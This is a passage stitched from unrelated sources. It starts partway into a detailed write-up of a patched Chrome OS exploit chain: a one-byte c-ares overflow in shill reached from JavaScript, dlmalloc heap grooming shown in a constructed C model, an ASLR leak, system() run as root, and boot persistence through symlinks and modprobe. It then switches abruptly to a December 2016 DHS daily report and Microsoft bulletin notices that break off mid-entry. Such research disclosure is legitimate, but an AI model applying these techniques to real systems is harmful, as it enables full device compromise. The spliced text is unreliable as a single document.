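    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        unsigned char buf[64];
        printf("%-16s wire=%zu vulnerable=%zu fixed=%zu overflow=%d written=%zu\n",
               names[i], name_wire_len(names[i]), alloc_len_vulnerable(names[i]),
               alloc_len_fixed(names[i]), overflow_bytes(names[i]),
               encode_name(names[i], buf, sizeof buf));
    }
    return 0;
}
```

Note that a name ending in an escaped backslash followed by a real dot ("a\\\\." in C syntax) is handled correctly by both calculations; only the escaped dot at the very end trips the vulnerable check, which is why the bug survived ordinary hostnames.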

Exploit from JavaScript?

Shill runs as root. A direct exploit from JavaScript would accomplish in a single step what might otherwise take three: renderer code execution -> browser code execution -> privilege escalation to root. That means less work and fewer points of failure. It is also convenient that shill and chrome are separate processes: if the exploit fails and crashes shill, it doesn’t bring down chrome, and shill is restarted automatically. The direct exploit turned out to be possible, but not without difficulties.

There doesn’t seem to be an obvious way to get chrome to place “\.” at the end of a Host header over plain HTTP. So instead the exploit uses the TURN protocol through WebRTC and encodes what looks like an HTTP request into the username field of TURN. TURN is a binary protocol, and this only works because the proxy’s HTTP parsing is so lax.

Also, shill listens on a random port, so the exploit uses TURN again to scan the localhost ports, measuring connection time to determine whether a port is open. The scan also runs into a surprising behavior, explained nicely here: if the source and destination TCP ports of a localhost connection attempt happen to match, the kernel connects the socket to itself, and anything sent on the socket is received on that same socket. This causes false positives, so the scan must retry until a single candidate port remains.

A more difficult issue is that there aren’t any decent memory grooming primitives. The proxy allocates the headers into a vector of strings, applies minimal processing to the Via and Host headers, forwards the headers to another server and frees them. It accepts a single client at a time. The number of headers is limited to <= 0x7f, header size to <= 0x800 bytes and the TURN packet to <= 0x8000 bytes. The rough plan is to do the grooming over 6 connections, or stages. The problem is that different stages need to reliably place allocations at the same location, which is difficult because the memory layout changes between connections in ways that are hard to predict. The solution is to create what I call a persistent 0x820-byte hole.

820 hole

First, it should be mentioned that shill uses dlmalloc, which is a best-fit allocator: malloc() uses the smallest free chunk that can fit the request, and free() coalesces any neighboring free chunks.

Let’s look at the picture of grooming at stage 1. This creates a persistent hole of 0x820 bytes:

[Figure: groom_820.png]

Red means that the chunk is in use and green means it is free. Cyan is the large top chunk of dlmalloc. The number on each chunk is the chunk size in hex, with the 0x omitted. In the rest of this post I’ll always refer to chunk sizes in hex, omitting the 0x, and I’ll often use a chunk size as a noun, as a short way of referring to the chunk of that size. I’ll omit the actual grooming primitives used for these allocations, but for those interested, the Host and Via header processing here is what is used.

So the first picture shows how the 820 hole is created. Four chunks of size 410 are allocated from the top chunk in [0-3]. In [5,6], the first 410 is freed and replaced with the backing allocation of the vector of headers. Even though the headers themselves are freed when the stage 1 connection closes, the backing allocation of the vector persists across connections. The fourth 410 is also freed and the buffer for incoming server data is placed into it; it too persists across stages. Then the connection closes, the two 410 headers in the middle are freed and they consolidate into an 820.

Why is this 820 hole useful? It is persistent because the 410 before it and the 410 after it are not freed between stages. Each stage can now start with the steps:

  • allocate the 820
  • eat all free holes up to the top chunk by doing tons of small allocations
  • free the 820

Let’s say a stage then allocates a small chunk of 100. dlmalloc uses the smallest free chunk that fits, which is the 820, because all smaller ones were allocated. Now let’s say the stage finishes and the 100 is freed. The next stage can use the same algorithm to place a 100 at the same location. This capability allows just enough grooming in stages 2 and 3 to get from a one-byte overwrite to overlapping chunks.

But things could go wrong. There might be another 820 hole by chance, and different stages might allocate a different 820. Or the tons of small allocations might fail to eat all the holes, because the amount of memory allocated per connection is limited. So the exploit attempts to get rid of most of the free chunks before stage 1 by combining different techniques. An interesting one is that it intentionally crashes shill: the process is restarted automatically and starts with a clean heap layout. It also uses two techniques to allocate lots of memory, more than the limits mentioned above allow. I won’t go into the details here though.

Overlapping chunks

Stage 2 triggers the memory corruption and stage 3 creates overlapping chunks:

[Figure: groom_overlap.png]

First, a 1e0 chunk is allocated in [10-12] by allocating 640, then 1e0, and then freeing 640. Then the query buffer of ares is allocated into the 110 slot at [13]. This leaves a free 530 in the middle. Now is a good time to take a closer look at the dlmalloc chunk header, declared here:

[Figure: malloc_chunk.png]

This header is kept in front of each chunk. The 3 least significant bits of the size field are used as flags; most importantly, lsb = 1 indicates that the previous chunk is in use. So looking at [13], the 530 chunk has size = 531 and the 1e0 chunk has prev_size = 530. The prev_size field is only used when the previous chunk is free; otherwise the previous chunk’s user data spans the prev_size field. This means that the size field of 530 immediately follows the query buffer in 110. The single byte that overflows the query buffer overwrites the least significant byte of the size field of 530: 0x31 -> 0x01. The three flag bits are not affected, but the chunk size is corrupted from 530 to 500, as can be seen in [14].

What’s interesting is that 1e0 doesn’t know anything about this corruption and its prev_size remains 530. Now, [15-17] split the free 500 into a free 2e0 and an in-use 220. But dlmalloc is already confused at this point: when it tries to update the prev_size of the chunk following 220, it is off by 30 bytes from 1e0. And 1e0 keeps believing that prev_size = 530. It also believes that the previous chunk is free, even though 220 is in use. So now, in [18], 1e0 is freed and tries to coalesce with a previous 530 chunk. There is a 2e0 where there used to be a 530; dlmalloc is fine with that and creates a large 710 chunk that overlaps the 220.
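To make the arithmetic above concrete, here is a constructed C model of the relevant dlmalloc bookkeeping, added for this page and not part of the original post or of dlmalloc itself. It lays out the chunks of step [13] in a byte array (assuming a 64-bit little-endian target, so a chunk header is two 8-byte words and a stray byte lands on the low byte of the size field), applies the one-byte overwrite of [14], performs the split of [15-17] and the backward coalescing of [18] following dlmalloc’s rule of trusting prev_size whenever the PINUSE bit is clear, and checks that the resulting free chunk overlaps the in-use 220. Offsets are bytes into the array, not real addresses, and the bin unlinking that real dlmalloc performs is left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a dlmalloc chunk header: the two machine words in
 * front of the user data.  prev_foot holds the previous chunk's size while
 * that chunk is free; head holds this chunk's size with flags in the low
 * three bits.  Assumes a 64-bit little-endian target like the x86_64
 * Chrome OS build discussed in the post. */
#define PINUSE_BIT ((size_t)1)            /* previous chunk is in use */
#define CINUSE_BIT ((size_t)2)            /* this chunk is in use */
#define SIZE_MASK  (~(size_t)7)

typedef struct { size_t prev_foot; size_t head; } chunk_hdr;

static size_t heap_words[0x1000 / sizeof(size_t)];   /* simulated arena */
#define heap ((uint8_t *)heap_words)                 /* byte view; offsets below index it */

chunk_hdr *chunk_at(size_t off) { return (chunk_hdr *)(heap + off); }
size_t chunksize(size_t off)    { return chunk_at(off)->head & SIZE_MASK; }
int pinuse(size_t off)          { return (chunk_at(off)->head & PINUSE_BIT) != 0; }
size_t next_chunk(size_t off)   { return off + chunksize(off); }

/* Step [13]: in-use 110 (the ares query buffer) at 0, free 530 at 110,
 * in-use 1e0 at 640 whose prev_foot records the free 530 before it. */
void layout_step13(void)
{
    memset(heap, 0, sizeof heap_words);
    chunk_at(0x000)->head = 0x110 | CINUSE_BIT | PINUSE_BIT;
    chunk_at(0x110)->head = 0x530 | PINUSE_BIT;       /* free, so CINUSE clear: 0x531 */
    chunk_at(0x640)->prev_foot = 0x530;
    chunk_at(0x640)->head = 0x1e0 | CINUSE_BIT;       /* previous chunk free: PINUSE clear */
}

/* Step [14]: the query runs one byte past its buffer.  The user data of an
 * in-use chunk extends over the next chunk's prev_foot, so the first byte
 * beyond it is the low byte of the 530's head: 0x31 -> 0x01.  The stray
 * byte is the low byte of dnsclass (IN = 1). */
void overflow_one_byte(void)
{
    ((uint8_t *)&chunk_at(0x110)->head)[0] = 0x01;
}

/* Steps [15-17]: carve what dlmalloc now takes for a 500 chunk into a free
 * 2e0 and an in-use 220.  The in-use mark for "the chunk after 220" lands
 * at 110 + 500 = 610, 30 bytes short of the real 1e0 at 640, so the 1e0
 * keeps prev_foot = 530 and PINUSE clear. */
void split_corrupted_chunk(void)
{
    chunk_at(0x110)->head = 0x2e0 | PINUSE_BIT;       /* free remainder */
    chunk_at(0x3f0)->prev_foot = 0x2e0;               /* footer of the free 2e0 */
    chunk_at(0x3f0)->head = 0x220 | CINUSE_BIT;       /* in use, previous chunk free */
    chunk_at(next_chunk(0x3f0))->head |= PINUSE_BIT;  /* written at 610, not 640 */
}

/* Step [18]: free the chunk at OFF with dlmalloc's backward coalescing: if
 * PINUSE is clear, trust prev_foot, step back that far and merge.  Returns
 * the offset of the merged free chunk. */
size_t free_chunk(size_t off)
{
    size_t psize = chunksize(off);
    if (!pinuse(off)) {
        size_t prevsize = chunk_at(off)->prev_foot;   /* stale 530, not 2e0 */
        off -= prevsize;
        psize += prevsize;
        /* real dlmalloc also unlinks the previous chunk from its bin here */
    }
    chunk_at(off)->head = psize | PINUSE_BIT;         /* free: CINUSE clear */
    chunk_at(off + psize)->prev_foot = psize;
    chunk_at(off + psize)->head &= ~PINUSE_BIT;
    return off;
}

/* 1 if the free chunk at FREE_OFF covers any byte of the in-use chunk at
 * INUSE_OFF: memory the allocator will hand out again while it is live. */
int chunks_overlap(size_t free_off, size_t inuse_off)
{
    size_t free_end  = free_off + chunksize(free_off);
    size_t inuse_end = inuse_off + chunksize(inuse_off);
    return free_off < inuse_end && inuse_off < free_end;
}

/* Run steps [13]-[18]; returns the merged size (530 + 1e0 = 710) and the
 * merged chunk's offset through MERGED_OFF. */
size_t run_overlap_demo(size_t *merged_off)
{
    layout_step13();
    overflow_one_byte();
    split_corrupted_chunk();
    size_t off = free_chunk(0x640);
    if (merged_off)
        *merged_off = off;
    return chunksize(off);
}

int main(void)
{
    size_t off, merged = run_overlap_demo(&off);
    printf("free chunk at %zx size %zx, overlaps in-use 220 at 3f0: %s\n",
           off, merged, chunks_overlap(off, 0x3f0) ? "yes" : "no");
    return 0;
}
```

The point the model makes is that nothing in free() cross-checks prev_size against the size field of the chunk it points at; the stale 530 is believed, and the 220 that the program still holds becomes part of a free 710 that the next allocation of a suitable size will hand back.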

This kind of overlapping chunk is relatively easy to exploit; it is good both for breaking ASLR and for getting RCE. The technique for going from a single-byte overflow to overlapping chunks is not new: Chris Evans demonstrated it here in 2014 as part of an investigation for this Project Zero post. I’m not sure whether anyone demonstrated it earlier.

What’s not shown in the picture, for simplicity, is that [14-15] is the boundary between stages 2 and 3. The memory corruption of stage 2 occurs in DNS code after the Via and Host headers are processed, so no further grooming is possible in that stage. Stage 3 continues the grooming to get overlapping chunks. But the 110 query buffer is actually freed after stage 2, so stage 3 needs to reallocate a 110 chunk at the same location; the method described above is used for that.

ASLR

Stage 4 breaks ASLR. It first turns the overlapping 220 into a more convenient 810 chunk:

[Figure: groom_810.png]

So it allocates the 820, which overwrites the header of 220 and changes the size to 810. It’s interesting to note that the fd and bk pointers in the header of 220 are also overwritten. The exploit can’t afford to corrupt pointers at this point because it hasn’t broken ASLR yet, but fd and bk are only used when the chunk is free: they link the chunk into a doubly linked freelist. [21] frees the overwritten chunk and dlmalloc finds it to be of size 810.

Next, two free 2a0 chunks are crafted into the 810:

[Figure: groom_aslr.png]

So a 2a0 is allocated, a 2d0 is allocated and the 2a0 is freed. Now the fd and bk pointers just mentioned are leaked to break ASLR. The two 2a0 chunks have the same size and are placed into the same freelist. With additional grooming at the beginning of stage 4, the exploit can be certain that the two chunks are the only ones in this freelist. Well, there is also a third element linked in: the freelist head, allocated statically in libc. So looking at the first 2a0, its fd and bk point to the other 2a0 and into libc. Also, the first 2a0 overlaps with the 820, which contains an HTTP header that is forwarded to an attacker-controlled HTTP proxy. So that leaks two pointers, which the proxy server forwards to JavaScript. The two pointers are used to calculate the address of the 820 and the base address of libc.

To root

ASLR defeated, stages 5 and 6 get code execution:

[Figure: groom_system.png]

The rough idea is to overwrite a BindState, which holds callback information: a function pointer and its arguments. The function pointer is overwritten to point to system() in libc, whose base address is now known, and the first argument is overwritten to point to a shell command string crafted into the 820 slot, whose address is also known. The BindState chunk size is 40, so 810 is now resized to 40. First, [25] frees 2d0, which consolidates back into 810. For the 810 chunk to be placed into the size-40 freelist, it is removed from its current freelist by allocating it in [27]. The size of 810 is overwritten to 40 by freeing 820 in [26] and reallocating it with new data in [28]. [29] frees the resized 40 and [30] allocates a BindState into it. BindState now conveniently overlaps with 820. [31-32] reallocate 820 to corrupt the BindState so that it launches system(). The particular callback used triggers in 30 seconds, and system() runs a shell command as root.

Persistence bug

It may sound surprising, but an attacker who has gained root on Chrome OS loses those privileges after a reboot. Chrome OS has verified boot: the bootloader in read-only memory verifies the kernel, which in turn verifies the hash of each disk block it needs at runtime. This applies to the system partition, which contains all the executable binaries, libraries and scripts, so an attacker can’t just set up a script to run at boot. But there is also a stateful partition that can be modified. It is intended for variable stuff like logs, configuration files and caches.

The way this exploit achieves persistence across reboots will sound familiar to anyone who has read about this exploit by geohot. Both use symlinks, dump_vpd_log and modprobe. The dump_vpd_log script itself was fixed to not follow symlinks, but here is a snippet from /etc/init/ui-collect-machine-info.conf:

[Figure: persistence_bug.png]

/var is on the stateful partition, so UI_MACHINE_INFO_FILE can be turned into an arbitrary symlink. dump_vpd_log --full --stdout writes /mnt/stateful_partition/unencrypted/cache/vpd/full-v2.txt to stdout. This can be used to create an arbitrary file with arbitrary contents during boot. geohot used dump_vpd_log to write a command into /proc/sys/kernel/modprobe at boot, so that a following modprobe would execute the command. But there are some extra problems when trying to reuse this approach.

The first issue is that /var/run is a symlink to /run, which is a tmpfs and not persistent. The exploit makes /var/run persistent by relinking it to /var/real_run. Some parts of Chrome OS get confused by that, which is dealt with by using more symlinks. I’ll skip the details here.

modprobe.d config file

So now it’s possible to write into arbitrary files during boot. Another issue is that writing into /proc/sys/kernel/modprobe with dump_vpd_log won’t work in this case, because the following udevadm writes into the same file and its output can’t be controlled; the last write() syscall is what counts when writing into /proc/sys/kernel/modprobe. So instead, the exploit creates /run/modprobe.d, which is a configuration file for modprobe. Parsing of modprobe.d is lax: any line of the form "install modulename command..." specifies a command to execute when that module is loaded, and any lines that fail to parse are ignored.

Late modprobe

The final problem is that ui-collect-machine-info.conf runs late during boot, when all modprobing is complete, so the created configuration file is not of much use by itself. The final trick is to find a way to trigger modprobe late during boot. The exploit creates a device file with mknod that has major number 173. 173 is unknown to the kernel, which means that when something accesses the device file, the kernel will attempt to modprobe a handler module named char-major-173-0. Then it is sufficient to turn some commonly accessed file into a symlink to the device file, and each access to the file will trigger a modprobe. The exploit uses /var/lib/metrics/uma-event.

There is yet one more issue. The stateful partition is mounted with the nodev flag, which blocks access to device files, so the device has to be moved to /dev during startup. This code in /etc/init/cryptohomed.conf is used for that:

[Figure: mv.png]

The device is created as /mnt/stateful_partition/home/.shadow/attestation.epb, and /mnt/stateful_partition/unencrypted/preserve/attestation.epb is turned into a symlink to /dev/net. This moves the device to /dev/net. /dev/net is used instead of /dev because cryptohomed changes the owner of the target attestation.epb; with /dev as the target, that would change the owner of the whole /dev directory and cause chrome to crash.

So that completes the Rube Goldberg machine of symlinks. dump_vpd_log creates the /run/modprobe.d configuration file with a command to launch as root. cryptohomed moves a device file to /dev/net. Any generated metric accesses the uma-event symlink to the device, which launches modprobe, which launches the command from modprobe.d.

Patches

By now, the issues have been fixed pretty thoroughly. c-ares was patched in Chrome OS and upstream. The HTTP proxy was removed from shill. The TURN implementation was hardened to block JavaScript from sending an arbitrary username to a localhost TCP port. And the symlink issues were fixed here, here, here and here.

Wednesday, December 14, 2016

Complete DHS Report for December 14, 2016

Daily Report

Top Stories

• Officials reported December 12 that about 176,000 gallons of oil leaked from a 6-inch Belle Fourche Pipeline Co. pipeline into a tributary of the Little Missouri River and a hillside near Belfield, North Dakota. – Duluth News Tribune

2. December 12, Duluth News Tribune – (North Dakota) North Dakota oil pipeline spill estimated at 176,000 gallons. The North Dakota Department of Health announced December 12 that an estimated 176,000 gallons of oil leaked from a 6-inch Belle Fourche Pipeline Co. pipeline into a tributary of the Little Missouri River and a hillside near Belfield. Cleanup crews have recovered 36,876 gallons of oil since the leak was discovered by a landowner December 5. Source: http://www.duluthnewstribune.com/news/4178352-north-dakota-oil-pipeline-spill-estimated-176000-gallons

• Two New Jersey men were charged December 12 for allegedly orchestrating a securities fraud scheme that netted over $26 million in illegal proceeds. – Associated Press. See item 6 below in the Financial Services Sector

• A Kansas couple pleaded guilty December 12 for their roles in a trade based money laundering conspiracy where the duo deposited at least $1.6 million in undeclared cash and $5.2 million worth of undeclared third-party checks into their joint account. – Garden City Telegram. See item 7 below in the Financial Services Sector

• Quest Diagnostics Incorporated is investigating December 12 after a third-party accessed an Internet application on its network November 26 and obtained the protected health information of roughly 34,000 patients. – WPXI 11 Pittsburgh

24. December 12, WPXI 11 Pittsburgh – (National) Quest Diagnostics says hackers obtained protected health information of 34,000 patients. Quest Diagnostics Incorporated announced December 12 that it is investigating after a third-party accessed the MyQuest by Care360 Internet application on the company’s network November 26 and obtained the protected health information of roughly 34,000 patients. Company officials stated there is no evidence that the patient information has been misused. Source: http://www.wpxi.com/news/quest-diagnostics-says-hackers-obtained-protected-health-information-of-34000-patients/475436855
  
Financial Services Sector

5. December 12, Boston Globe – (Massachusetts) Chelsea man charged with series of bank robberies. A man dubbed the “Spelling Bee Bandit” was charged December 12 for allegedly committing 4 bank robberies in the Greater Boston area between October and November 2016. Source: http://www.boston.com/news/crime/2016/12/12/chelsea-man-charged-with-series-of-bank-robberies

6. December 12, Associated Press – (National) 2 charged in securities fraud plot netting $26M illegally. Two New Jersey men were charged December 12 for allegedly orchestrating a securities fraud scheme that netted over $26 million in illegal proceeds by using dozens of brokerage accounts, some of which were listed in the names of family members or other individuals, to drive up the cost of $10 billion in securities, and subsequently sell the securities they owned at inflated prices. The duo was barred from future trading in securities on others’ accounts. Source: http://www.nytimes.com/aponline/2016/12/12/us/ap-us-securities-fraud-charges.html?_r=0

7. December 12, Garden City Telegram – (International) Meade couple pleads guilty to money laundering. A Meade, Kansas couple pleaded guilty December 12 for their roles in a trade based money laundering conspiracy where the duo deposited at least $1.6 million in undeclared cash and $5.2 million worth of undeclared third-party checks that the husband received from his trips to Mexico into a joint account they kept at Plains State Bank in Plains, Kansas. The couple would then transfer the funds in the account to buy genetically modified corn seed that was transported to Mexico. Source: http://www.gctelegram.com/news/local/meade-couple-pleads-guilty-to-money-laundering/article_28fc9c0d-4c89-51bf-bbac-296ba1163e7f.html

8. December 12, SecurityWeek – (International) Ostap backdoor installs banking trojans, PoS malware. Proofpoint security researchers reported that a newly spotted backdoor, dubbed Ostap was being leveraged by a threat group to install banking trojans such as Dridex, Ursnif, and Tinba, as well as point-of-sale (PoS) malware on devices belonging to financial services companies in several countries. Proofpoint found that the threat group leveraged spam emails with malicious Microsoft Word attachments for distribution, and the backdoor remains active on a targeted device after the Word attachment has been closed, and writes a copy of itself to the victim’s Startup folder for persistence, among other malicious actions. Source: http://www.securityweek.com/ostap-backdoor-installs-banking-trojans-pos-malware

For another story, see item 27 below in the Information Technology Sector

Information Technology Sector

27. December 13, SecurityWeek – (International) Flaw in PwC security tool exposes SAP systems to attacks. Security researchers at ESNC discovered PricewaterhouseCoopers’ Automated Controls Evaluator (ACE) tool was plagued with a remote code execution flaw that could be exploited to remotely inject and execute malicious Advanced Business Application Programming (ABAP) code on a targeted Systems, Applications and Products (SAP) system. The flaw could allow a malicious actor to manipulate accounting documents and financial results, bypass segregation of duties restrictions, and bypass change management controls, potentially resulting in fraud, theft or manipulation of sensitive data, and unauthorized payment transactions and transfer of money.

28. December 13, SecurityWeek – (International) Serious vulnerabilities found in McAfee Enterprise product. A security researcher discovered Intel Security’s McAfee VirusScan Enterprise for Linux (VSEL) product versions 2.0.3 and earlier are plagued by 10 vulnerabilities, including information disclosure flaws, cross-site request forgery (CSRF) bugs, remote code execution flaws, and privilege escalation issues, among other vulnerabilities, 4 of which can be chained to achieve remote code execution with root privileges. Intel Security advised users to upgrade to Endpoint Security for Linux (ENSL) 10.2 or later to avoid the flaws. Source: http://www.securityweek.com/serious-vulnerabilities-found-mcafee-enterprise-product

29. December 12, SecurityWeek – (International) Flaws allow remote hacking of Moxa MiiNePort devices. Moxa released firmware updates for its MiiNePort embedded serial device servers after a security researcher found the devices were plagued with two vulnerabilities, one of which can be exploited to brute-force an active session cookie and download a device’s configuration file containing sensitive information such as the administrator password remotely from the Internet, which could give a malicious actor unrestricted privileges and allow the attacker access to the device. The second vulnerability relates to how the configuration data is stored in a file without being encrypted. Source: http://www.securityweek.com/flaws-allow-remote-hacking-moxa-miineport-devices

30. December 12, SecurityWeek – (International) Users warned of Zcash miner infections. Kaspersky Lab reported that cybercriminals have covertly infected roughly 1,000 devices with software that mine for Zcash (ZEC), a new cryptocurrency worth about $49 per ZEC, in order to make a significant profit. Kaspersky Lab stated cybercriminals were disguising the miners as legitimate applications and distributing them via torrent Websites, and reported that no attempts to install the miners using Website vulnerabilities or email spam campaigns have been spotted.

31. December 12, SecurityWeek – (International) Alpha version of Sandboxed Tor Browser available for Linux. The Tor developer known as Yawning Angel released Sandboxed Tor Browser 0.0.2, a version of the browser designed to offer additional security to users as it traps exploits and prevents them from accessing files and the real Internet Protocol (IP) and media access control (MAC) addresses of the host. The developer warned the new version has unresolved issues affecting security and fingerprinting, and the application is only compatible with Linux systems as it leverages bubblewrap, a sandboxing utility for Linux.

Communications Sector

Nothing to report

MS15-094 – Critical: Cumulative Security Update for Internet Explorer (3089548) – Version: 1.1

Severity Rating: Critical
Revision Note: V1.1 (December 13, 2016): Bulletin revised to include an additional vulnerability, CVE-2015-2496. This is an informational change only. Customers who have successfully installed the updates do not need to take any further action.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

MS16-126 – Moderate: Security Update for Microsoft Internet Messaging API (3196067) – Version: 2.0

Severity Rating: Moderate
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce that the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates.
  • Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391.
  • Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393.
  • Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392.
These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker successfully convinces a user of an affected system to visit a malicious or compromised website. Note that you must install two updates to be protected from the vulnerability discussed in this bulletin: The update in this bulletin, MS16-126, and the update in MS16-118.

MS16-124 – Important: Security Update for Windows Registry (3193227) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce that the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates.
  • Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391.
  • Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393.
  • Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392.
These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker can access sensitive registry information.

MS16-120 – Critical: Security Update for Microsoft Graphics Component (3192884) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce that the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates.
  • Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391.
  • Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393.
  • Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392.
These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync. The most serious of these vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

MS16-122 – Critical: Security Update for Microsoft Video Control (3195360) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce that the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates.
  • Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391.
  • Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393.
  • Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392.
These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker successfully convinces a user of an affected system to visit a malicious or compromised website. Note that you must install two updates to be protected from the vulnerability discussed in this bulletin: The update in this bulletin, MS16-116, and the update in MS16-104.

MS16-137 – Important: Security Update for Windows Authentication Methods (3199173) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce that the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates.
  • Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867.
  • Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868.
  • Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876.
  • Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877.
  • Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873.
  • Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874.
These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves multiple vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege. To exploit this vulnerability, the attacker would first need to authenticate to the target, domain-joined system using valid user credentials. An attacker who successfully exploited this vulnerability could elevate their permissions from an unprivileged user account to administrator.

MS16-142 – Critical: Cumulative Security Update for Internet Explorer (3198467) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-140 – Important: Security Update for Boot Manager (3193479) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow security feature bypass if an attacker installs an affected boot policy and bypasses Windows security features.

MS16-151 – Important: Security Update for Windows Kernel-Mode Drivers (3205651) – Version: 1.0

Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published
Summary: This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

MS16-150 – Important: Security Update for Secure Kernel Mode (3205642) – Version: 1.0

